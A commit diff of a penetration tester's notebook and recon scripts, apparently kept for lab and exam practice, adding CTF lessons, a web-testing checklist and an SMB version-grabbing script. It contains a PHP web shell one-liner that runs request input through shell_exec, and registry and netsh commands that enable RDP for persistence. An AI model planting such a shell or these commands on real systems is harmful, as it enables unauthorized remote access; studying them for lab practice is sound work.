a machine a day and a steady pace

KeepNotes/BookmarkList/cheet sheets and syntax/local enumeration/windows/windows version identifiers/node.xml

@@ -5,7 +5,7 @@
   <key>expanded</key><false/>
   <key>nodeid</key><string>be7737f0-bdfc-4108-b214-828386d2d71d</string>
   <key>modified_time</key><integer>1516807336</integer>
-  <key>expanded2</key><false/>
+  <key>expanded2</key><true/>
   <key>content_type</key><string>text/xhtml+xml</string>
   <key>created_time</key><integer>1516807336</integer>
   <key>info_sort_dir</key><integer>1</integer>

KeepNotes/BookmarkList/exploitation development/debuggers - tools/immunity debugger/node.xml

@@ -5,7 +5,7 @@
   <key>duplicate_of</key><string>6a29041d-816f-4c53-b9f1-e8e47464094e</string>
   <key>nodeid</key><string>494516dd-0766-4688-b1e9-2362ae94d011</string>
   <key>modified_time</key><integer>1515084318</integer>
-  <key>expanded2</key><false/>
+  <key>expanded2</key><true/>
   <key>content_type</key><string>text/xhtml+xml</string>
   <key>created_time</key><integer>1515084222</integer>
   <key>info_sort_dir</key><integer>1</integer>

KeepNotes/BookmarkList/labs - ctf - practice/labs lessons learned/node.xml

@@ -4,7 +4,7 @@
 <dict>
   <key>title</key><string>Labs Lessons Learned</string>
   <key>nodeid</key><string>0b9e9fd7-2fac-41fb-bd53-bbeceab93ee3</string>
-  <key>modified_time</key><integer>1537758706</integer>
+  <key>modified_time</key><integer>1538362425</integer>
   <key>version</key><integer>6</integer>
   <key>content_type</key><string>text/xhtml+xml</string>
   <key>created_time</key><integer>1537246320</integer>

KeepNotes/BookmarkList/labs - ctf - practice/labs lessons learned/page.html

@@ -6,8 +6,14 @@
 </head><body>XP is a pain to deal with because nothing new works. Even have to get an old version of accesschk. <br/>
 Speaking of which, never forget /accepteula for sysinternals tools....<br/>
 <br/>
-| can be used for multiple commands in cmd.exe<br/>
+| can be used for multiple commands in cmd.exe in older versions of Windows<br/>
 <br/>
 python (if it's installed) is just easier than working with vbs<br/>
 <br/>
-Don't bang your head against the wall for too long. Move on and come back if needed. </body></html>
+Don't bang your head against the wall for too long. Move on and come back if needed. <br/>
+<br/>
+Match the payload for the OS AND the language (if possible). IE, using ear and war files? java shell.<br/>
+<br/>
+Tools can enum a service differently. IE Web browser can show (and allow you to do) one thing, and native protocol (say ftp) can show (and allow you to do) something different. <br/>
+<br/>
+Default creds for the service before searching for exploits. Conversely, always grab authenticated exploits when found in searching (even if you don't have cred access 'yet')</body></html>

KeepNotes/BookmarkList/methodologies/personal/node.xml

@@ -5,7 +5,7 @@
   <key>expanded</key><false/>
   <key>nodeid</key><string>88a102d5-49f1-4996-8bf1-0e8c56765992</string>
   <key>modified_time</key><integer>1533052880</integer>
-  <key>expanded2</key><true/>
+  <key>expanded2</key><false/>
   <key>content_type</key><string>text/xhtml+xml</string>
   <key>created_time</key><integer>1516569405</integer>
   <key>info_sort_dir</key><integer>1</integer>

KeepNotes/BookmarkList/methodologies/personal/services/http/node.xml

@@ -5,7 +5,8 @@
   <key>expanded</key><true/>
   <key>title</key><string>HTTP</string>
   <key>nodeid</key><string>293269ba-8b96-4fd6-8f53-84cff5fe1fc9</string>
-  <key>modified_time</key><integer>1536691382</integer>
+  <key>modified_time</key><integer>1538333365</integer>
+  <key>expanded2</key><false/>
   <key>version</key><integer>6</integer>
   <key>content_type</key><string>text/xhtml+xml</string>
   <key>created_time</key><integer>1536257673</integer>

KeepNotes/BookmarkList/methodologies/personal/services/http/page.html

@@ -21,10 +21,12 @@
 <li style="list-style-type: none">Interesting links?</li>
 </ul>
 </li>
-<li style="list-style-type: none">Older machine? Test Shellshock</li>
+<li style="list-style-type: none">CGI pages? Older machine? Test Shellshock</li>
 </ul>
 </li>
 <li style="list-style-type: none"></li>
+<li style="list-style-type: none">Test default logins! RTFM! (enables authenticated exploits if able)</li>
+<li style="list-style-type: none"></li>
 <li style="list-style-type: none">Time to test forms:</li>
 <li style="list-style-type: none"><ul><li style="list-style-type: none">SQL injection</li>
 <li style="list-style-type: none">Straight up command injection</li>

KeepNotes/BookmarkList/notebook.nbk

@@ -71,7 +71,7 @@
         </dict>
         <key>viewers</key><dict>
             <key>ids</key><dict>
-                <key>88d8d396-b35f-47d9-9b59-5d1cbc1b4fb3</key><dict>
+                <key>c592707e-3656-436f-91bb-3f7e7e394a36</key><dict>
                     <key>selected_treeview_nodes</key><array>
                         <string>a98e8d44-f4ec-43dd-ad96-a168c5740b03</string>
                     </array>
@@ -82,12 +82,12 @@
                 <key>eb6d623b-faa3-49a0-97b4-ca4b884f9972</key><dict>
                     <key>tabs</key><array>
                         <dict>
-                            <key>viewerid</key><string>88d8d396-b35f-47d9-9b59-5d1cbc1b4fb3</string>
+                            <key>viewerid</key><string>c592707e-3656-436f-91bb-3f7e7e394a36</string>
                             <key>viewer_type</key><string>three_pane_viewer</string>
                             <key>name</key><string></string>
                         </dict>
                     </array>
-                    <key>current_viewer</key><string>88d8d396-b35f-47d9-9b59-5d1cbc1b4fb3</string>
+                    <key>current_viewer</key><string>c592707e-3656-436f-91bb-3f7e7e394a36</string>
                 </dict>
             </dict>
         </dict>

KeepNotes/BookmarkList/passwords and hashes/password dumping/windows/node.xml

@@ -5,7 +5,7 @@
   <key>expanded</key><false/>
   <key>nodeid</key><string>09c272ee-dc24-4200-ad74-688e5b05b074</string>
   <key>modified_time</key><integer>1524237085</integer>
-  <key>expanded2</key><false/>
+  <key>expanded2</key><true/>
   <key>content_type</key><string>text/xhtml+xml</string>
   <key>created_time</key><integer>1522525726</integer>
   <key>info_sort_dir</key><integer>1</integer>

KeepNotes/BookmarkList/post-exploitation persistence/windows/rats/rdp/node.xml

@@ -4,7 +4,7 @@
 <dict>
   <key>title</key><string>RDP</string>
   <key>nodeid</key><string>54d26f5a-43c5-41a6-bd8d-82b072307c80</string>
-  <key>modified_time</key><integer>1536895148</integer>
+  <key>modified_time</key><integer>1538282111</integer>
   <key>version</key><integer>6</integer>
   <key>content_type</key><string>text/xhtml+xml</string>
   <key>created_time</key><integer>1536260016</integer>

KeepNotes/BookmarkList/post-exploitation persistence/windows/rats/rdp/page.html

@@ -8,7 +8,6 @@
 <br/>
 + <b>Enable RDP</b>: <br/>
 netsh firewall set service RemoteDesktop enable<br/>
-<br/>
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f<br/>
 reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f<br/>
 <br/>

KeepNotes/BookmarkList/reverse shells - shells/php/code injection/ippsec/node.xml

@@ -4,7 +4,7 @@
 <dict>
   <key>title</key><string>Ippsec</string>
   <key>nodeid</key><string>0ae12cda-b3b1-45d3-99ac-da4328f6ff74</string>
-  <key>modified_time</key><integer>1537727149</integer>
+  <key>modified_time</key><integer>1538163430</integer>
   <key>version</key><integer>6</integer>
   <key>content_type</key><string>text/xhtml+xml</string>
   <key>created_time</key><integer>1534966481</integer>

KeepNotes/BookmarkList/reverse shells - shells/php/code injection/ippsec/page.html

@@ -14,4 +14,4 @@
 ?&gt;<br/>
 EOD;<br/>
 <br/>
-&lt;?php if (isset($_REQUEST['ipp'])){echo "&lt;pre&gt;".shell_exec($_REQUEST['ipp'])."&lt;/pre&gt;";}; &nbsp;?&gt;</body></html>
+&lt;?php if (isset($_REQUEST['ipp'])){echo '&lt;pre&gt;'.shell_exec($_REQUEST['ipp']).'&lt;/pre&gt;';}; &nbsp;?&gt;</body></html>

KeepNotes/BookmarkList/reverse shells - shells/php/node.xml

@@ -6,7 +6,7 @@
   <key>duplicate_of</key><string>afc3f443-d1e0-4506-82de-1eaf7e17c400</string>
   <key>nodeid</key><string>48f6450f-a99c-4e17-ba80-64fc8cd4e91a</string>
   <key>modified_time</key><integer>1534087625</integer>
-  <key>expanded2</key><false/>
+  <key>expanded2</key><true/>
   <key>content_type</key><string>text/xhtml+xml</string>
   <key>created_time</key><integer>1479230360</integer>
   <key>info_sort_dir</key><integer>1</integer>

KeepNotes/BookmarkList/tools/password related/node.xml

@@ -5,7 +5,7 @@
   <key>expanded</key><false/>
   <key>nodeid</key><string>a92ca3c9-c7af-4b1b-a8b1-fe9cb92681b4</string>
   <key>modified_time</key><integer>1516733078</integer>
-  <key>expanded2</key><true/>
+  <key>expanded2</key><false/>
   <key>content_type</key><string>application/x-notebook-dir</string>
   <key>created_time</key><integer>1516733078</integer>
   <key>info_sort_dir</key><integer>1</integer>

scripts/recon_enum/smbrecon.py

@@ -150,3 +150,12 @@ def mkdir_p(path):
     f.write(res)
     f.write("\n")
 f.close()
+
+print "INFO: Performing smbver check for %s" % (ip_address)
+outfile = "/root/scripts/recon_enum/results/exam/smb/%s_%s_smbversion" % (ip_address, port)
+results = subprocess.check_output(['smbver.sh',ip_address])
+f = open(outfile,'w+')
+for res in results:
+    f.write(res)
+    f.write("\n")
+f.close()

scripts/recon_enum/smbver.sh

@@ -0,0 +1,14 @@
+#!/bin/sh
+#Author: rewardone
+#Description:
+# Requires root or enough permissions to use tcpdump
+# Will listen for the first 8 packets of a null login
+# and grab the SMB Version
+#Notes:
+# Will sometimes not capture or will print multiple
+# lines. May need to run a second time for success.
+if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
+if [ ! -z $2 ]; then rport=$2; else rport=139; fi
+tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
+echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
+echo "" && sleep .1